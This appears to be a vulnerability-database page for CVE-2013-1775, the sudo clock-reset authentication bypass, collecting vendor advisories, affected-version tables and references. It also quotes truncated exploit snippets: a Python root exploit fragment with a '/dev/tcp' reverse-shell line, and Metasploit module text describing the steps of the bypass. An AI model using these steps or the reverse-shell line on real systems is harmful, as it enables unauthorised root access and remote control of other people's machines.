CVE-2013-1775
published 2013-03-05CVE-2013-1775: sudo 1.6.0 through 1.7.10p6 and sudo 1.8.0 through 1.8.6p6 allows local users or physically proximate attackers to bypass intended time restrictions and retain…
PriorityP432medium6.9CVSS 2.0
AVLACMAuNCCICAC
EXPLOIT
EPSS
3.18%
86.6th percentile
sudo 1.6.0 through 1.7.10p6 and sudo 1.8.0 through 1.8.6p6 allows local users or physically proximate attackers to bypass intended time restrictions and retain privileges without re-authenticating by setting the system clock and sudo user timestamp to the epoch.
Affected
86 ranges· showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| apple | mac_os_x | <= 10.10.4 | — |
| apple | os_x_yosemite_v10.10.5_and_security_update_2015-006 | — | — |
| debian | sudo | < sudo 1.8.5p2-1+nmu1 (bookworm) | sudo 1.8.5p2-1+nmu1 (bookworm) |
| sudo_project | sudo | >= 0 < 1.8.5p2-1+nmu1 | 1.8.5p2-1+nmu1 |
| sudo_project | sudo | >= 0 < 1.8.5p2-1+nmu1 | 1.8.5p2-1+nmu1 |
| sudo_project | sudo | >= 0 < 1.8.5p2-1+nmu1 | 1.8.5p2-1+nmu1 |
| sudo_project | sudo | >= 0 < 1.8.5p2-1+nmu1 | 1.8.5p2-1+nmu1 |
| todd_miller | sudo | — | — |
| todd_miller | sudo | — | — |
| todd_miller | sudo | — | — |
| todd_miller | sudo | — | — |
| todd_miller | sudo | — | — |
| todd_miller | sudo | — | — |
| todd_miller | sudo | — | — |
| todd_miller | sudo | — | — |
| todd_miller | sudo | — | — |
| todd_miller | sudo | — | — |
| todd_miller | sudo | — | — |
| todd_miller | sudo | — | — |
| todd_miller | sudo | — | — |
| todd_miller | sudo | — | — |
| todd_miller | sudo | — | — |
| todd_miller | sudo | — | — |
| todd_miller | sudo | — | — |
| todd_miller | sudo | — | — |
CVSS provenance
nvdv2.06.9MEDIUMAV:L/AC:M/Au:N/C:C/I:C/A:C
osv6.9MEDIUM
vendor_debian6.9MEDIUM
vendor_redhat6.9MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-3f5j-4h2q-jfx9: sudo 1
ghsa_unreviewed·2022-05-17
CVE-2013-1775 [MEDIUM] GHSA-3f5j-4h2q-jfx9: sudo 1
sudo 1.6.0 through 1.7.10p6 and sudo 1.8.0 through 1.8.6p6 allows local users or physically proximate attackers to bypass intended time restrictions and retain privileges without re-authenticating by setting the system clock and sudo user timestamp to the epoch.
OSV
CVE-2013-1775: sudo 1
osv·2013-03-05·CVSS 6.9
CVE-2013-1775 [MEDIUM] CVE-2013-1775: sudo 1
sudo 1.6.0 through 1.7.10p6 and sudo 1.8.0 through 1.8.6p6 allows local users or physically proximate attackers to bypass intended time restrictions and retain privileges without re-authenticating by setting the system clock and sudo user timestamp to the epoch.
Ubuntu
Sudo vulnerability
vendor_ubuntu·2013-02-28
CVE-2013-1775 Sudo vulnerability
Title: Sudo vulnerability
Summary: Sudo could be made to run programs as the administrator without a password
prompt.
Marco Schoepl discovered that Sudo incorrectly handled time stamp files
when the system clock is set to epoch. A local attacker could use this
issue to run Sudo commands without a password prompt.
Instructions: In general, a standard system update will make all the necessary changes.
Red Hat
sudo: authentication bypass via reset system clock
vendor_redhat·2013-02-27·CVSS 6.9
CVE-2013-1775 [MEDIUM] sudo: authentication bypass via reset system clock
sudo: authentication bypass via reset system clock
sudo 1.6.0 through 1.7.10p6 and sudo 1.8.0 through 1.8.6p6 allows local users or physically proximate attackers to bypass intended time restrictions and retain privileges without re-authenticating by setting the system clock and sudo user timestamp to the epoch.
Debian
CVE-2013-1775: sudo - sudo 1.6.0 through 1.7.10p6 and sudo 1.8.0 through 1.8.6p6 allows local users or...
vendor_debian·2013·CVSS 6.9
CVE-2013-1775 [MEDIUM] CVE-2013-1775: sudo - sudo 1.6.0 through 1.7.10p6 and sudo 1.8.0 through 1.8.6p6 allows local users or...
sudo 1.6.0 through 1.7.10p6 and sudo 1.8.0 through 1.8.6p6 allows local users or physically proximate attackers to bypass intended time restrictions and retain privileges without re-authenticating by setting the system clock and sudo user timestamp to the epoch.
Scope: local
bookworm: resolved (fixed in 1.8.5p2-1+nmu1)
bullseye: resolved (fixed in 1.8.5p2-1+nmu1)
forky: resolved (fixed in 1.8.5p2-1+nmu1)
sid: resolved (fixed in 1.8.5p2-1+nmu1)
trixie: resolved (fixed in 1.8.5p2-1+nmu1)
Apple
CVE-2013-1775: OS X Yosemite v10.10.5 and Security Update 2015-006
vendor_apple·CVSS 6.9
CVE-2013-1775 [MEDIUM] CVE-2013-1775: OS X Yosemite v10.10.5 and Security Update 2015-006
Apple Security Update: About the security content of OS X Yosemite v10.10.5 and Security Update 2015-006
Product: OS X Yosemite v10.10.5 and Security Update 2015-006
CVE: CVE-2013-1775
Component: CVE-2013-1775
No detection rules found.
Exploit-DB
Apple Mac OSX 10.8.4 - Local Privilege Escalation
exploitdb·2013-08-30
CVE-2013-1775 Apple Mac OSX 10.8.4 - Local Privilege Escalation
Apple Mac OSX 10.8.4 - Local Privilege Escalation
---
#!/usr/bin/python
# Original MSF Module:
# https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/osx/local/sudo_password_bypass.rb
###################################################################################################
# Exploit Title: OSX & /dev/tcp/%s/%s 0>&1 &\n" % (ipaddr,port))
print """
###############################################################
#
# OSX < 10.8.4 Local Root Priv Escalation Root Reverse Shell
#
# Written by: David Kennedy @ TrustedSec
# Website: https://www.trustedsec.com
# Twitter: @Dave_ReL1K
#
# Reference: http://www.exploit-db.com/exploits/27944/
###############################################################
"""
print "[*] Exploit has been performed. You should have a s
Exploit-DB
Apple Mac OSX - Sudo Password Bypass (Metasploit)
exploitdb·2013-08-29·CVSS 6.9
CVE-2013-1775 [MEDIUM] Apple Mac OSX - Sudo Password Bypass (Metasploit)
Apple Mac OSX - Sudo Password Bypass (Metasploit)
---
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#
# http://metasploit.com/
##
require 'shellwords'
class Metasploit3 'Mac OS X Sudo Password Bypass',
'Description' => %q{
This module gains a session with root permissions on versions of OS X with
sudo binary vulnerable to CVE-2013-1775. Tested working on Mac OS 10.7-10.8.4,
and possibly lower versions.
If your session belongs to a user with Administrative Privileges
(the user is in the sudoers file and is in the "admin group"), and the
user has ever run the "sudo" command, it is possible to become the super
user by running `su
Metasploit
Mac OS X Sudo Password Bypass
metasploit·CVSS 6.9
CVE-2013-1775 [MEDIUM] Mac OS X Sudo Password Bypass
Mac OS X Sudo Password Bypass
This module gains a session with root permissions on versions of OS X with sudo binary vulnerable to CVE-2013-1775. Tested working on Mac OS 10.7-10.8.4, and possibly lower versions. If your session belongs to a user with Administrative Privileges (the user is in the sudoers file and is in the "admin group"), and the user has ever run the "sudo" command, it is possible to become the super user by running `sudo -k` and then resetting the system clock to 01-01-1970. This module will fail silently if the user is not an admin, if the user has never run the sudo command, or if the admin has locked the Date/Time preferences. Note: If the user has locked the Date/Time preferences, requests to overwrite the system clock will be ignored, and the module will silently f
Bugzilla
CVE-2013-1775 CVE-2013-1776 sudo various flaws [fedora-all]
bugzilla·2013-02-27·CVSS 6.9
CVE-2013-1775 [MEDIUM] CVE-2013-1775 CVE-2013-1776 sudo various flaws [fedora-all]
CVE-2013-1775 CVE-2013-1776 sudo various flaws [fedora-all]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected versions
of Fedora.
For comments that are specific to the vulnerability please use bugs filed
against the "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When creating a Bodhi update request, please use the bodhi submission link
noted in the next comment(s). This will include the bug IDs of this
tracking bug as well as the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the
Bodhi notes field when available.
Please note: this issue affects multiple supp
Bugzilla
CVE-2013-1775 sudo: authentication bypass via reset system clock
bugzilla·2013-02-27·CVSS 6.9
CVE-2013-1775 [MEDIUM] CVE-2013-1775 sudo: authentication bypass via reset system clock
CVE-2013-1775 sudo: authentication bypass via reset system clock
From the upstream advisory:
When a user successfully authenticates with sudo, a time stamp file is updated to allow that user to continue running sudo without requiring a password for a preset time period (five minutes by default). The user's time stamp file can be reset using "sudo -k" or removed altogether via "sudo -K".
A user who has sudo access and is able to control the local clock (common in desktop environments) can run a command via sudo without authenticating as long as they have previously authenticated themselves at least once by running "sudo -k" and then setting the clock to the epoch (1970-01-01 01:00:00).
The vulnerability does not permit a user to run commands other than those allowed by the sudoers policy
http://lists.apple.com/archives/security-announce/2013/Sep/msg00002.htmlhttp://lists.apple.com/archives/security-announce/2015/Aug/msg00001.htmlhttp://lists.opensuse.org/opensuse-updates/2013-03/msg00066.htmlhttp://osvdb.org/90677http://rhn.redhat.com/errata/RHSA-2013-1353.htmlhttp://rhn.redhat.com/errata/RHSA-2013-1701.htmlhttp://support.apple.com/kb/HT5880http://www.debian.org/security/2013/dsa-2642http://www.openwall.com/lists/oss-security/2013/02/27/22http://www.oracle.com/technetwork/topics/security/ovmbulletinjul2016-3090546.htmlhttp://www.securityfocus.com/bid/58203http://www.slackware.com/security/viewer.php?l=slackware-security&y=2013&m=slackware-security.517440http://www.sudo.ws/repos/sudo/rev/ddf399e3e306http://www.sudo.ws/repos/sudo/rev/ebd6cc75020fhttp://www.sudo.ws/sudo/alerts/epoch_ticket.htmlhttp://www.ubuntu.com/usn/USN-1754-1https://support.apple.com/kb/HT205031http://lists.apple.com/archives/security-announce/2013/Sep/msg00002.htmlhttp://lists.apple.com/archives/security-announce/2015/Aug/msg00001.htmlhttp://lists.opensuse.org/opensuse-updates/2013-03/msg00066.htmlhttp://osvdb.org/90677http://rhn.redhat.com/errata/RHSA-2013-1353.htmlhttp://rhn.redhat.com/errata/RHSA-2013-1701.htmlhttp://support.apple.com/kb/HT5880http://www.debian.org/security/2013/dsa-2642http://www.openwall.com/lists/oss-security/2013/02/27/22http://www.oracle.com/technetwork/topics/security/ovmbulletinjul2016-3090546.htmlhttp://www.securityfocus.com/bid/58203http://www.slackware.com/security/viewer.php?l=slackware-security&y=2013&m=slackware-security.517440http://www.sudo.ws/repos/sudo/rev/ddf399e3e306http://www.sudo.ws/repos/sudo/rev/ebd6cc75020fhttp://www.sudo.ws/sudo/alerts/epoch_ticket.htmlhttp://www.ubuntu.com/usn/USN-1754-1https://support.apple.com/kb/HT205031
2013-03-05
Published